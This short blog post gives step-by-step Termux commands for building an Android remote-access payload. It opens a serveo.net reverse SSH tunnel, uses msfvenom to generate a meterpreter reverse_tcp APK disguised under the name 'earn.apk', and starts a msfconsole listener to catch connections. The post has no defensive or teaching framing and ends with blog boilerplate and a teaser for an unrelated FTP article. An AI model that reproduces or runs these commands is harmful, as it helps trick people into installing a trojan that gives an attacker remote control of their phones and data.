PAYLOAD GENERATOR for termux

PAYLOAD GENERATOR


$ pkg install openssh
$ ssh -R 0:localhost:1492 serveo.net

NEW PAGE

$ msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=(port) -o /sdcard/earn.apk

NEW PAGE

$ msfconsole
$ set PAYLOAD android/meterpreter/reverse_tcp
$ set LHOST (localhost)
$ set LPORT (port)
$ exploit

No comments:

Post a Comment

How to connect to an FTP server from Linux?

To connect to an FTP server from a Linux system, you can use either a command-line FTP client or a graphical one. Here’s how to do it usin...